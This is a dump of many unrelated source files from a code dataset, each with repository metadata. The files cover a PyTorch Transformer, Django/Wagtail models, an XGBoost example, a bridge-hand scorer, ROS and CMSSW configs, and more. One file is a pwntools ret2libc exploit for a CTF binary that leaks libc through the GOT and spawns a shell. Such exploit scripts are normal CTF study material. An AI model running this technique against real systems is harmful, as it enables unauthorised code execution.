div_term = torch.exp(torch.arange(0., d_model, 2) *
-(math.log(10000.0) / d_model))
pe[:, 0::2] = torch.sin(position * div_term) # 偶数列
pe[:, 1::2] = torch.cos(position * div_term) # 奇数列
pe = pe.unsqueeze(0) # [1, max_len, d_model]
self.register_buffer('pe', pe)
def forward(self, x):
# 输入模型的整个Embedding是Word Embedding与Positional Embedding直接相加之后的结果
x = x + Variable(self.pe[:, :x.size(1)], requires_grad=False)
return self.dropout(x)
# 在位置编码下方,将基于位置添加正弦波。对于每个维度,波的频率和偏移都不同。
plt.figure(figsize=(15, 5))
pe = PositionalEncoding(20, 0)
y = pe.forward(Variable(torch.zeros(1, 100, 20)))
plt.plot(np.arange(100), y[0, :, 4:8].data.numpy())
plt.legend(["dim %d"%p for p in [4,5,6,7]])
# ###########MultiHeadAttention#################
class MultiHeadedAttention(nn.Module):
def __init__(self, h, d_model, dropout=0.1):
"Take in model size and number of heads."
super(MultiHeadedAttention, self).__init__()
assert d_model % h == 0
self.d_k = d_model // h
self.h = h
self.linears = clones(nn.Linear(d_model, d_model), 4)
self.attn = None
self.dropout = nn.Dropout(p=dropout)
def forward(self, query, key, value, mask=None):
"""
实现MultiHeadedAttention。
输入的q,k,v是形状 [batch, L, d_model]。
输出的x 的形状同上。
"""
if mask is not None:
# Same mask applied to all h heads.
mask = mask.unsqueeze(1)
nbatches = query.size(0)
# 1) 这一步qkv变化:[batch, L, d_model] ->[batch, h, L, d_model/h]
query, key, value = \
[l(x).view(nbatches, -1, self.h, self.d_k).transpose(1, 2)
for l, x in zip(self.linears, (query, key, value))]
# 2) 计算注意力attn 得到attn*v 与attn
# qkv :[batch, h, L, d_model/h] -->x:[b, h, L, d_model/h], attn[b, h, L, L]
x, self.attn = attention(query, key, value, mask=mask, dropout=self.dropout)
# 3) 上一步的结果合并在一起还原成原始输入序列的形状
x = x.transpose(1, 2).contiguous().view(nbatches, -1, self.h * self.d_k)
# 最后再过一个线性层
return self.linears[-1](x)
# ################Add&Norm#################
class LayerNorm(nn.Module):
"""构造一个layernorm模块"""
def __init__(self, features, eps=1e-6):
super(LayerNorm, self).__init__()
self.a_2 = nn.Parameter(torch.ones(features))
self.b_2 = nn.Parameter(torch.zeros(features))
self.eps = eps
def forward(self, x):
"Norm"
mean = x.mean(-1, keepdim=True)
std = x.std(-1, keepdim=True)
return self.a_2 * (x - mean) / (std + self.eps) + self.b_2
class SublayerConnection(nn.Module):
"""Add+Norm"""
def __init__(self, size, dropout):
super(SublayerConnection, self).__init__()
self.norm = LayerNorm(size)
self.dropout = nn.Dropout(dropout)
def forward(self, x, sublayer):
"add norm"
return x + self.dropout(sublayer(self.norm(x)))
# #############Feed-Forword Network###########
class PositionwiseFeedForward(nn.Module):
"实现FFN函数"
def __init__(self, d_model, d_ff, dropout=0.1):
super(PositionwiseFeedForward, self).__init__()
self.w_1 = nn.Linear(d_model, d_ff)
self.w_2 = nn.Linear(d_ff, d_model)
self.dropout = nn.Dropout(dropout)
def forward(self, x):
return self.w_2(self.dropout(F.relu(self.w_1(x))))
# ##########Encoder主架构的代码##############
def clones(module, N):
"产生N个相同的层"
return nn.ModuleList([copy.deepcopy(module) for _ in range(N)])
class Encoder(nn.Module):
"""N层堆叠的Encoder"""
def __init__(self, layer, N):
super(Encoder, self).__init__()
self.layers = clones(layer, N)
self.norm = LayerNorm(layer.size)
def forward(self, x, mask):
"每层layer依次通过输入序列与mask"
for layer in self.layers:
x = layer(x, mask)
return self.norm(x)
# ############Decoder的代码主要结构##############
# Decoder部分
class Decoder(nn.Module):
"""带mask功能的通用Decoder结构"""
def __init__(self, layer, N):
super(Decoder, self).__init__()
self.layers = clones(layer, N)
self.norm = LayerNorm(layer.size)
def forward(self, x, memory, src_mask, tgt_mask):
for layer in self.layers:
x = layer(x, memory, src_mask, tgt_mask)
return self.norm(x)
# ################mask#####################
def subsequent_mask(size):
"""
mask后续的位置,返回[size, size]尺寸下三角Tensor
对角线及其左下角全是1,右上角全是0
"""
attn_shape = (1, size, size)
subsequent_mask = np.triu(np.ones(attn_shape), k=1).astype('uint8')
return torch.from_numpy(subsequent_mask) == 0
# ##########Encoder-Decoder Multi-head Attention###################
class DecoderLayer(nn.Module):
"Decoder is made of self-attn, src-attn, and feed forward (defined below)"
def __init__(self, size, self_attn, src_attn, feed_forward, dropout):
super(DecoderLayer, self).__init__()
self.size = size
self.self_attn = self_attn
self.src_attn = src_attn
self.feed_forward = feed_forward
self.sublayer = clones(SublayerConnection(size, dropout), 3)
def forward(self, x, memory, src_mask, tgt_mask):
"将decoder的三个Sublayer串联起来"
m = memory
x = self.sublayer[0](x, lambda x: self.self_attn(x, x, x, tgt_mask))
x = self.sublayer[1](x, lambda x: self.src_attn(x, m, m, src_mask))
return self.sublayer[2](x, self.feed_forward)
# #########Linear and Softmax to Produce Output Probabilities############
class Generator(nn.Module):
"""
Define standard linear + softmax generation step。
定义标准的linear + softmax 生成步骤。
"""
def __init__(self, d_model, vocab):
super(Generator, self).__init__()
self.proj = nn.Linear(d_model, vocab)
def forward(self, x):
return F.log_softmax(self.proj(x), dim=-1) | [
"762115542@qq.com"
] | 762115542@qq.com |
e5d3bbcfe8a0f176cd05149a1ff34ab74cc535cf | e0980f704a573894350e285f66f4cf390837238e | /.history/flex/models_20201030102256.py | 24833cc279761223d63ee1229f3fb82f233a9c19 | [] | no_license | rucpata/WagtailWebsite | 28008474ec779d12ef43bceb61827168274a8b61 | 5aa44f51592f49c9a708fc5515ad877c6a29dfd9 | refs/heads/main | 2023-02-09T15:30:02.133415 | 2021-01-05T14:55:45 | 2021-01-05T14:55:45 | 303,961,094 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,537 | py | from django.db import models
from wagtail.core.models import Page
from wagtail.core.fields import StreamField
from wagtail.admin.edit_handlers import StreamFieldPanel
from wagtail.snippets.blocks import SnippetChooserBlock
from wagtail.images.blocks import ImageChooserBlock
from wagtail.core import blocks as wagtail_blocks
from streams import blocks
from home.models import new_table_options
class FlexPage(Page):
parent_page_type = ["home.H"]
body = StreamField([
('title', blocks.TitleBlock()),
('cards', blocks.CardsBlock()),
('image_and_text', blocks.ImageAndTextBlock()),
('cta', blocks.CallToActionBlock()),
('testimonial', SnippetChooserBlock(
target_model='testimonials.Testimonial',
template = 'streams/testimonial_block.html'
)),
('pricing_table', blocks.PricingTableBlock(
table_options=new_table_options,
)),
('richtext', wagtail_blocks.RichTextBlock(
template = 'streams/simple_richtext_block.html',
features = ['bold', 'italic', 'ol', 'ul', 'link']
)),
('large_image', ImageChooserBlock(
help_text = 'Ten obraz będzie przycięty do 1200px na 775px',
template='streams/large_image_block.html'
))
], null=True, blank=True)
content_panels = Page.content_panels + [
StreamFieldPanel('body'),
]
class Meta:
verbose_name = 'Flex (misc) page'
verbose_name_plural = 'Flex (misc) pages' | [
"rucinska.patrycja@gmail.com"
] | rucinska.patrycja@gmail.com |
e2f4b4e6ea3c3f336a0d95eb369d269665bf9fb9 | b3699724907850fd26cbce4509fec83a33b89760 | /python/ray/util/xgboost/simple_example.py | f8881e75d0f5f6391b2239475889122141e005b5 | [
"Apache-2.0",
"MIT"
] | permissive | BonsaiAI/ray | 5e2f26a81d865a795261d11f9182aca7f07c7b97 | 941d30f082fe879ea30618af14327c25b5a21a74 | refs/heads/master | 2023-06-12T05:15:29.370188 | 2021-05-06T07:03:53 | 2021-05-06T07:03:53 | 233,708,687 | 3 | 5 | Apache-2.0 | 2023-05-27T08:06:37 | 2020-01-13T22:41:47 | Python | UTF-8 | Python | false | false | 1,114 | py | from sklearn import datasets
from sklearn.model_selection import train_test_split
from ray.util.xgboost import RayDMatrix, RayParams, train
# __xgboost_begin__
def main():
# Load dataset
data, labels = datasets.load_breast_cancer(return_X_y=True)
# Split into train and test set
train_x, test_x, train_y, test_y = train_test_split(
data, labels, test_size=0.25)
train_set = RayDMatrix(train_x, train_y)
test_set = RayDMatrix(test_x, test_y)
# Set config
config = {
"tree_method": "approx",
"objective": "binary:logistic",
"eval_metric": ["logloss", "error"],
"max_depth": 3,
}
evals_result = {}
# Train the classifier
bst = train(
config,
train_set,
evals=[(test_set, "eval")],
evals_result=evals_result,
ray_params=RayParams(max_actor_restarts=1, num_actors=1),
verbose_eval=False)
bst.save_model("simple.xgb")
print("Final validation error: {:.4f}".format(
evals_result["eval"]["error"][-1]))
# __xgboost_end__
if __name__ == "__main__":
main()
| [
"noreply@github.com"
] | BonsaiAI.noreply@github.com |
df9cff14fdbf62a866cf77be1ff6d7b3f37cd1d0 | 236498cd8daf971ef53cd120051d76c72474330d | /fetch-gazettes.py | 4e65868eecf60ad83be066f8f9e8b4c0e60b7522 | [] | no_license | OpenUpSA/saflii-gazettes | 2106130e1e0dac45a630f4e26f583c56879bc9f2 | 12d25bf00c47d6f9e4d3950e0ef2373bd17c5589 | refs/heads/master | 2021-10-23T21:53:06.583034 | 2019-03-20T08:54:54 | 2019-03-20T08:54:54 | 81,817,880 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,110 | py | #!/usr/bin/env python
#
# Script to generate Registry.txt and pdf-urls.txt for gazettes from opengazettes.org.za
import json
import os
import os.path
entries = []
urls = []
# what jurisdiction code should we use?
with open("jurisdiction.txt") as f:
jurisdiction = f.read().strip()
print "Only using gazettes for jurisdiction code: %s" % jurisdiction
# generate an entry for each gazette entry
with open("gazette-index-latest.jsonlines", "r") as f:
for line in f:
gazette = json.loads(line)
if gazette['jurisdiction_code'] != jurisdiction:
continue
fname = os.path.basename(gazette['archive_url'])
urls.append(gazette['archive_url'])
entries.append('"%s" (%s) %s' % (fname, gazette['publication_date'], gazette['issue_title']))
# write the new registry
with open("Registry.txt.new", "w") as f:
f.write("\n".join(entries))
# write the new urls
with open("pdf-urls.txt.new", "w") as f:
f.write("\n".join(urls))
# atomically rename the files
os.rename("Registry.txt.new", "Registry.txt")
os.rename("pdf-urls.txt.new", "pdf-urls.txt")
| [
"greg@kempe.net"
] | greg@kempe.net |
71fa9d5981516b87f29091fb9f9f3d80fb0b2f7b | 5dbb41859b177778b124d9f9ca5828ca8a5c529e | /aula10.py | e2d96a78cc4c84dc93ff526ed17ee6e25fbbf947 | [] | no_license | hevalenc/Curso_DIO_Python_basico | 4d7163a7496d17ec248472b075bfbb0988412d26 | 59a1e2aabc98f7bc3db49eea16170974fd75e9a3 | refs/heads/main | 2023-03-21T05:29:37.847492 | 2021-03-18T16:25:22 | 2021-03-18T16:25:22 | 349,142,834 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,628 | py | #o 'datetime' é uma biblioteca do python, o comando 'strftime' serve para usar a biblioteca de data e hora
#'%d/%m/%y' e '%A %B %Y' são diretivas para definir o formato de exibição de data
#'%H:%M:%S' diretiva para horas,
from datetime import date, time, datetime, timedelta
def trabalhando_com_datetime():
data_atual = datetime.now()
print(data_atual)
print(data_atual.strftime('%d/%m/%Y %H:%M:%S'))
print(data_atual.strftime('%c'))
print(data_atual.day)
print(data_atual.weekday())
tupla = ('segunda', 'terça', 'quarta', 'quinta', 'sexta', 'sábado', 'domingo')
print(tupla[data_atual.weekday()])
#foi usado a tupla para chamar o dia da semana, como no exemplo
data_criada = datetime(2018, 6, 20, 15, 30, 20)
print(data_criada.strftime('%c'))
data_string = '01/01/2019 12:20:22'
data_convertida = datetime.strptime(data_string, '%d/%m/%Y %H:%M:%S')
print(data_convertida)
nova_data = data_convertida - timedelta(days=365, hours=2)
print(nova_data)
nova_data1 = data_convertida + timedelta(days=365, hours=2)
print(nova_data1)
def trabalhando_com_date():
data_atual = date.today()
data_atual_str = data_atual.strftime('%A %B %Y')
print(type(data_atual))
print(data_atual_str)
print(type(data_atual_str))
#print(data_atual.strftime('%d/%m/%y'))
def trabalhando_com_time():
horario = time(hour=15, minute=18, second=30)
print(horario)
horario_str = horario.strftime('%H:%M:%S')
print(horario_str)
if __name__ == '__main__':
trabalhando_com_date()
trabalhando_com_time()
trabalhando_com_datetime()
| [
"heitorvalenca7@gmail.com"
] | heitorvalenca7@gmail.com |
63b17fc4261dad20778c5a4e48aa81f3868daa44 | fcdce57c1bd0cc4f52679fd0f3f82532550083fa | /282/bridgehand.py | 9b5c320bf36248545d8ba244453ecaab726c4014 | [] | no_license | nishanthegde/bitesofpy | a16a8b5fb99ab18dc1566e606170464a4df3ace0 | c28aa88e1366ab65f031695959d7cd0b3d08be6b | refs/heads/master | 2023-08-08T16:53:17.107905 | 2023-07-22T19:07:51 | 2023-07-22T19:07:51 | 183,959,400 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 7,209 | py | from enum import Enum
import typing
from dataclasses import dataclass, field
from collections import namedtuple, defaultdict
from collections.abc import Sequence
import random
from typing import List
from random import shuffle
suits = list("SHDC")
ranks = list("AKQJT98765432")
Suit = Enum("Suit", suits)
Rank = Enum("Rank", ranks)
Card = namedtuple("Card", ["suit", "rank"])
HCP = {Rank.A: 4, Rank.K: 3, Rank.Q: 2, Rank.J: 1}
SSP = {2: 1, 1: 2, 0: 3} # cards in a suit -> short suit points
@dataclass
class TestHand:
card_string: str
doubletons: int
singletons: int
voids: int
hcp: int
ssp: int
total_points: int
ltc: int
card_list: List[Card] = field(init=False)
def __post_init__(self):
""" Generate actual list of Card instances from card_string """
self.card_list = []
for suit_holding in self.card_string.split():
suit = Suit[suit_holding[0]]
for rank in suit_holding[2:]:
card = Card(suit, Rank[rank])
self.card_list.append(card)
shuffle(self.card_list)
test_hands = [
TestHand("S:AKJ H:QJT9 D:5432 C:AK", 1, 0, 0, 18, 1, 19, 6),
TestHand("S:A76 H:KT75 D:KQ2 C:AK8", 0, 0, 0, 19, 0, 19, 6),
TestHand("S:AKQJT98765432", 0, 0, 3, 10, 9, 19, 0),
TestHand("S:5432 H:5432 D:543 C:32", 1, 0, 0, 0, 1, 1, 11),
TestHand("S:K642 H:Q985 D:AT64 C:4", 0, 1, 0, 9, 2, 11, 7),
TestHand("S:KQ3 H:Q76 D:J43 C:J987", 0, 0, 0, 9, 0, 9, 9),
TestHand("S:A64 H:72 D:KJ8542 C:AJ", 2, 0, 0, 13, 2, 15, 7),
TestHand("S:AT4 H:86 D:A984 C:AKT7", 1, 0, 0, 15, 1, 16, 7),
TestHand("S:J972 H:9 D:98742 C:T54", 0, 1, 0, 1, 2, 3, 10),
TestHand("S:9854 H:K43 D:Q5 C:9873", 1, 0, 0, 5, 1, 6, 10),
TestHand("S:KT943 H:T63 D:JT5 C:97", 1, 0, 0, 4, 1, 5, 10),
TestHand("S:T9732 H:J86 D:K93 C:86", 1, 0, 0, 4, 1, 5, 10),
TestHand("S:KT8 H:94 D:AJT4 C:6532", 1, 0, 0, 8, 1, 9, 9),
TestHand("S:AQT92 H:J763 D:763 C:6", 0, 1, 0, 7, 2, 9, 8),
TestHand("S:AK94 H:K743 D:AKT C:72", 1, 0, 0, 17, 1, 18, 6),
TestHand("S:A974 D:AK94 C:QJ932", 0, 0, 1, 14, 3, 17, 5),
TestHand("S:J873 H:KJ62 D:A96 C:K8", 1, 0, 0, 12, 1, 13, 8),
TestHand("S:T732 H:T2 D:JT8 C:AK96", 1, 0, 0, 8, 1, 9, 9),
TestHand("S:KT H:AK975 D:QJT2 C:KJ", 2, 0, 0, 17, 2, 19, 5),
TestHand("S:KJT97 H:AQ843 D:86 C:5", 1, 1, 0, 10, 3, 13, 6)
]
class BridgeHand:
def __init__(self, cards: typing.Sequence[Card]):
"""
Process and store the sequence of Card objects passed in input.
Raise TypeError if not a sequence
Raise ValueError if any element of the sequence is not an instance
of Card, or if the number of elements is not 13
"""
if not isinstance(cards, Sequence):
raise TypeError("BridgeHand object must be initiated with card sequence")
elif len(cards) != 13:
raise ValueError("Card sequence must have 13 cards")
elif not all(isinstance(x, Card) for x in cards):
raise ValueError("Card sequence can have only card objects")
else:
self.cards = cards
def __str__(self) -> str:
"""
Return a string representing this hand, in the following format:
"S:AK3 H:T987 D:KJ98 C:QJ"
List the suits in SHDC order, and the cards within each suit in
AKQJT..2 order.
Separate the suit symbol from its cards with a colon, and
the suits with a single space.
Note that a "10" should be represented with a capital 'T'
"""
ret = ''
ret_dict = defaultdict(list)
for c in self.cards:
ret_dict[str(c.suit.name)].append(str(c.rank.name))
for s in sorted(ret_dict, key=lambda x: Suit[x].value):
ret += "{}:{} ".format(s, ''.join(sorted(ret_dict[s], key=lambda x: Rank[x].value)))
return "{}".format(ret.strip())
@property
def hcp(self) -> int:
""" Return the number of high card points contained in this hand """
hcp = 0
for suit_holding in self.__str__().split():
for c in suit_holding.strip().split(':')[1]:
if c == 'A':
hcp += 4
if c == 'K':
hcp += 3
if c == 'Q':
hcp += 2
if c == 'J':
hcp += 1
return hcp
@property
def doubletons(self) -> int:
""" Return the number of doubletons contained in this hand """
doubletons = 0
for suit_holding in self.__str__().split():
if len(suit_holding.strip().split(':')[1]) == 2:
doubletons += 1
return doubletons
@property
def singletons(self) -> int:
""" Return the number of singletons contained in this hand """
singletons = 0
for suit_holding in self.__str__().split():
if len(suit_holding.strip().split(':')[1]) == 1:
singletons += 1
return singletons
@property
def voids(self) -> int:
""" Return the number of voids (missing suits) contained in
this hand
"""
non_voids = 0
for suit_holding in self.__str__().split():
non_voids += 1
return 4 - non_voids
@property
def ssp(self) -> int:
""" Return the number of short suit points in this hand.
Doubletons are worth one point, singletons two points,
voids 3 points
"""
return self.doubletons * 1 + self.singletons * 2 + self.voids * 3
@property
def total_points(self) -> int:
""" Return the total points (hcp and ssp) contained in this hand """
return self.hcp + self.ssp
@property
def ltc(self) -> int:
""" Return the losing trick count for this hand - see bite description
for the procedure
"""
ltc = 0
for suit_holding in self.__str__().split():
# singletons
if len(suit_holding.strip().split(':')[1]) == 1:
for c in suit_holding.strip().split(':')[1]:
if c == 'A':
ltc += 0
else:
ltc += 1
# doubletons
if len(suit_holding.strip().split(':')[1]) == 2:
d_cards = suit_holding.strip().split(':')[1]
if d_cards == 'AK':
ltc += 0
elif d_cards[0] == 'A' or d_cards[0] == 'K':
ltc += 1
elif d_cards[0] == 'Q':
ltc += 2
else:
ltc += 2
# 3 card suit
if len(suit_holding.strip().split(':')[1]) >= 3:
t_cards = suit_holding.strip().split(':')[1][:3]
if t_cards == 'AKQ':
ltc += 0
elif t_cards[:2] == 'AK' or t_cards[:2] == 'AQ' or t_cards[:2] == 'KQ':
ltc += 1
elif t_cards[0] == 'A' or t_cards[0] == 'K' or t_cards[0] == 'Q':
ltc += 2
else:
ltc += 3
return ltc
| [
"nhegde@netflix.com"
] | nhegde@netflix.com |
f60397de642e3f12a66fcdec6cae5c94fd5de495 | 7185ae54efb2ce9ecd4bd9c53057053f6e799ae3 | /PWN/some/2019年7月17日-pwn-(水+ok+cpp)/pwn02/pwn2exp.py | 24a3645e72b65dccd0dcc3936b7502a14b8fcc14 | [] | no_license | 0xFF1E071F/CTFchallenge | 1b259c3f7cf8f7a1c20ea38cadd8f170bff137d1 | 12bb31a202b6110c05758fc4d57cfb58c98d9f23 | refs/heads/master | 2022-04-07T03:34:46.241887 | 2020-03-02T00:22:37 | 2020-03-02T00:22:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 766 | py | from pwn import *
context.log_level = 'debug'
p = process("./pwn02")
e = ELF("./pwn02")
p.recvuntil("time?\n")
p.sendline("134520896")
p.recvuntil("time?\n")
p.sendline('10000')
pop_ret = 0x0804898b
ppp_ret = 0x08048989
addr = 0x0804A058
payload = '1234' * 8
payload += p32(e.plt['read']) + p32(ppp_ret) + p32(0) + p32(addr) + p32(
4) + p32(0x080486FD)
p.recvuntil("ASLR\n")
p.sendline(payload)
p.sendline(p32(e.got['putchar']))
p.recvuntil("time?\n")
p.sendline("134520896")
p.recvuntil("time?\n")
p.sendline('10000')
p.recvuntil('\x0a')
libc_base = u32(p.recv(4)) - 0x60da0
libc_system = libc_base + 0x3a940
libc_binsh = libc_base + 0x15902b
payload = '1234' * 8
payload += p32(libc_system) + p32(pop_ret) + p32(libc_binsh)
p.sendline(payload)
p.interactive()
| [
"mozhaohua1999@outlook.com"
] | mozhaohua1999@outlook.com |
fd1fcb904335972d230abf0e0b9f8fa1588452ca | 695c1667d2b2b57ccb526cc2817bbe5c4038de5c | /navigator/src/plan.py | 24dac9a6c5d361b969b4178a7bd74b3b55573e2d | [] | no_license | Avinash-1501/cse550 | a6f18e2f84fd47595af994aa81b95fc20e9a311e | 36037193af4c7ac2af282471a66c064af3c6a0f4 | refs/heads/master | 2021-05-29T06:40:56.356026 | 2015-04-29T19:26:18 | 2015-04-29T19:26:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,668 | py | #!/usr/bin/python
import roslib; roslib.load_manifest('navigator')
from assignment05.path_planning import *
from navigator import *
# Parse Args
parser = argparse.ArgumentParser(description='Path Plan')
parser.add_argument('mapbag')
args = parser.parse_args(rospy.myargv()[1:])
# Get Data From Bag Files
the_map = get_dict( args.mapbag )['/map']
rospy.init_node('path_plan')
mpub = rospy.Publisher('/map', OccupancyGrid, latch=True)
mpub.publish(the_map)
ppub = rospy.Publisher('/start_pose', PoseStamped, latch=True)
path_pub = rospy.Publisher('/path', Path)
start_pose = None
goal_pose = None
def plan():
if start_pose is None or goal_pose is None:
return
result = to_grid2(start_pose[0],start_pose[1], the_map)
if not result:
print "INVALID START POSE"
return
else:
sx, sy = result
result = to_grid2(goal_pose[0],goal_pose[1], the_map)
if not result:
print "INVALID GOAL POSE"
return
else:
gx, gy = result
X = plan_path(sx, sy, gx, gy, the_map)
if X:
path_pub.publish(to_path(X, the_map))
else:
print "NO PATH"
def goal_sub(msg):
global goal_pose
goal_pose = to_tuple(msg.pose.position, msg.pose.orientation)
plan()
def start_sub(msg):
global start_pose
start_pose = to_tuple(msg.pose.pose.position, msg.pose.pose.orientation)
ps = PoseStamped()
ps.header = msg.header
ps.pose = apply(to_pose, start_pose)
ppub.publish(ps)
plan()
sub = rospy.Subscriber('/goal_pose', PoseStamped, goal_sub)
sub2 = rospy.Subscriber('/initialpose', PoseWithCovarianceStamped, start_sub)
rospy.spin()
| [
"davidvlu@gmail.com"
] | davidvlu@gmail.com |
b59d20addda1b62a145dcbfe767a7c76a7c061be | ad4c2aa0398406ccb7e70562560e75fa283ffa1a | /sum-of-left-leaves/sum-of-left-leaves.py | e9eb62561a866708b2384dbdd88bb0c50858d9ac | [
"Apache-2.0"
] | permissive | kmgowda/kmg-leetcode-python | 427d58f1750735618dfd51936d33240df5ba9ace | 4d32e110ac33563a8bde3fd3200d5804db354d95 | refs/heads/main | 2023-08-22T06:59:43.141131 | 2021-10-16T14:04:32 | 2021-10-16T14:04:32 | 417,841,590 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 746 | py | // https://leetcode.com/problems/sum-of-left-leaves
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution(object):
def sumOfLeftLeaves(self, root):
"""
:type root: TreeNode
:rtype: int
"""
self.total = 0
def sumLeftleaf(root, isleft):
if root:
if not root.left and not root.right:
if isleft:
self.total+=root.val
sumLeftleaf(root.left, True)
sumLeftleaf(root.right, False)
sumLeftleaf(root, False)
return self.total | [
"keshava.gowda@gmail.com"
] | keshava.gowda@gmail.com |
1105ec0b1ddb15924ebfc28ab85fa00d3efaa6f1 | 6baab869e16ed7cafdea7e0e68f27b7e0fc1c2ee | /demo_class/demo_5.py | 7feb701538b28b26283d5f7e1471c99811bbe084 | [] | no_license | SkewwG/Python_demo | ad4bd81207619bff23498b41833bc45695eab164 | 9357645287cc49d3396bd65062b71ac646076979 | refs/heads/master | 2021-05-03T05:21:56.685496 | 2018-07-06T00:02:59 | 2018-07-06T00:02:59 | 120,637,210 | 8 | 2 | null | null | null | null | UTF-8 | Python | false | false | 169 | py | def demo_yield(n):
print('cunting')
while n > 0:
print('before')
yield n
n -= 1
print('afeter')
print(demo_yield(5).__next__()) | [
"446106525@qq.com"
] | 446106525@qq.com |
43fa50129b5df8f91bad45446acac3e2c063f1d9 | ef6229d281edecbea3faad37830cb1d452d03e5b | /ucsmsdk/mometa/extpol/ExtpolControllerCont.py | ae30d6ff188351082a4f0e1dd925a6370910ef71 | [
"Apache-2.0"
] | permissive | anoop1984/python_sdk | 0809be78de32350acc40701d6207631322851010 | c4a226bad5e10ad233eda62bc8f6d66a5a82b651 | refs/heads/master | 2020-12-31T00:18:57.415950 | 2016-04-26T17:39:38 | 2016-04-26T17:39:38 | 57,148,449 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,257 | py | """This module contains the general information for ExtpolControllerCont ManagedObject."""
import sys, os
from ...ucsmo import ManagedObject
from ...ucscoremeta import UcsVersion, MoPropertyMeta, MoMeta
from ...ucsmeta import VersionMeta
class ExtpolControllerContConsts():
pass
class ExtpolControllerCont(ManagedObject):
"""This is ExtpolControllerCont class."""
consts = ExtpolControllerContConsts()
naming_props = set([])
mo_meta = MoMeta("ExtpolControllerCont", "extpolControllerCont", "controllers", VersionMeta.Version211a, "InputOutput", 0x1f, [], ["admin"], [u'extpolRegistry'], [u'extpolController'], ["Get"])
prop_meta = {
"child_action": MoPropertyMeta("child_action", "childAction", "string", VersionMeta.Version211a, MoPropertyMeta.INTERNAL, 0x2, None, None, r"""((deleteAll|ignore|deleteNonPresent),){0,2}(deleteAll|ignore|deleteNonPresent){0,1}""", [], []),
"dn": MoPropertyMeta("dn", "dn", "string", VersionMeta.Version211a, MoPropertyMeta.READ_ONLY, 0x4, 0, 256, None, [], []),
"gen_num": MoPropertyMeta("gen_num", "genNum", "uint", VersionMeta.Version211a, MoPropertyMeta.READ_ONLY, None, None, None, None, [], []),
"rn": MoPropertyMeta("rn", "rn", "string", VersionMeta.Version211a, MoPropertyMeta.READ_ONLY, 0x8, 0, 256, None, [], []),
"sacl": MoPropertyMeta("sacl", "sacl", "string", VersionMeta.Version302a, MoPropertyMeta.READ_ONLY, None, None, None, r"""((none|del|mod|addchild|cascade),){0,4}(none|del|mod|addchild|cascade){0,1}""", [], []),
"status": MoPropertyMeta("status", "status", "string", VersionMeta.Version211a, MoPropertyMeta.READ_WRITE, 0x10, None, None, r"""((removed|created|modified|deleted),){0,3}(removed|created|modified|deleted){0,1}""", [], []),
}
prop_map = {
"childAction": "child_action",
"dn": "dn",
"genNum": "gen_num",
"rn": "rn",
"sacl": "sacl",
"status": "status",
}
def __init__(self, parent_mo_or_dn, **kwargs):
self._dirty_mask = 0
self.child_action = None
self.gen_num = None
self.sacl = None
self.status = None
ManagedObject.__init__(self, "ExtpolControllerCont", parent_mo_or_dn, **kwargs)
| [
"test@cisco.com"
] | test@cisco.com |
5c2f4032248c9ab25d6bf54b79381af856bb74b5 | 759c447b4cc7105096983eadb87d667ae472d6c0 | /acme_diags/plot/colormaps/rewrite_from_colorcet.py | fa6946bff0a7c3ea3f15a0ac5cbcc5d39bfc6ac5 | [
"BSD-3-Clause"
] | permissive | kaabre/acme_diags | cd41014ee0f023eb8796c1ac414615be0fe99f53 | 40364724ce46f1e5ec91201764da1de593a1a5f0 | refs/heads/master | 2021-05-14T17:32:19.577633 | 2018-02-09T20:29:49 | 2018-02-09T20:29:49 | 116,049,920 | 0 | 0 | null | 2018-01-02T19:34:12 | 2018-01-02T19:34:12 | null | UTF-8 | Python | false | false | 763 | py | try:
import colorcet
except BaseException:
print "Cannot convert from colorcet w/o colorcet"
import sys
sys.exit()
all_cms = colorcet.cm
def dump_cmap(name, mpl_cmap):
nm = "cet_%s" % name
with open("%s.rgb" % nm, "w") as f:
f.write("# Converted from colorcet\n")
f.write("#\n")
f.write("# number of colors in table\n")
f.write("#ncolors = %i\n" % mpl_cmap.N)
f.write("#\n")
f.write("# r g b\n")
for i in range(mpl_cmap.N):
a = float(i) / float(mpl_cmap.N - 1)
r, g, b, a = [int(x * 255) for x in mpl_cmap(a)]
f.write(" %3s %3s %3s\n" % (r, g, b))
print "Wrote %s" % nm
for cmap in all_cms.keys():
dump_cmap(cmap, all_cms[cmap])
| [
"doutriaux1@llnl.gov"
] | doutriaux1@llnl.gov |
d74f5f77d2d099686d4658eabd6ee585ea46da9f | 4ad0dddd7a6e29b31d5780bf6dec6ebad776cf73 | /SimG4CMS/HGCalTestBeam/test/HGCalTBCERN170_cfg.py | d30e37913859424152ef656058b1ddaa63fd7e67 | [
"Apache-2.0"
] | permissive | llechner/cmssw | 95dcd6ae0ced5546853778c6ebdf0dd224030215 | 419d33be023f9f2a4c56ef4b851552d2d228600a | refs/heads/master | 2020-08-26T20:20:28.940065 | 2018-10-18T09:24:51 | 2018-10-18T09:24:51 | 131,112,577 | 0 | 0 | Apache-2.0 | 2019-10-23T17:59:17 | 2018-04-26T06:51:19 | C++ | UTF-8 | Python | false | false | 4,988 | py | import FWCore.ParameterSet.Config as cms
process = cms.Process('SIM')
# import of standard configurations
process.load("FWCore.MessageService.MessageLogger_cfi")
process.load('Configuration.StandardSequences.Services_cff')
process.load('SimGeneral.HepPDTESSource.pythiapdt_cfi')
process.load('Configuration.EventContent.EventContent_cff')
process.load('SimGeneral.MixingModule.mixNoPU_cfi')
process.load('SimG4CMS.HGCalTestBeam.HGCalTB170JulyXML_cfi')
process.load('Geometry.HGCalCommonData.hgcalNumberingInitialization_cfi')
process.load('Geometry.HGCalCommonData.hgcalParametersInitialization_cfi')
process.load('Configuration.StandardSequences.MagneticField_0T_cff')
process.load('Configuration.StandardSequences.Generator_cff')
process.load('IOMC.EventVertexGenerators.VtxSmearedFlat_cfi')
process.load('GeneratorInterface.Core.genFilterSummary_cff')
process.load('Configuration.StandardSequences.SimIdeal_cff')
process.load('Configuration.StandardSequences.EndOfProcess_cff')
process.load('Configuration.StandardSequences.FrontierConditions_GlobalTag_cff')
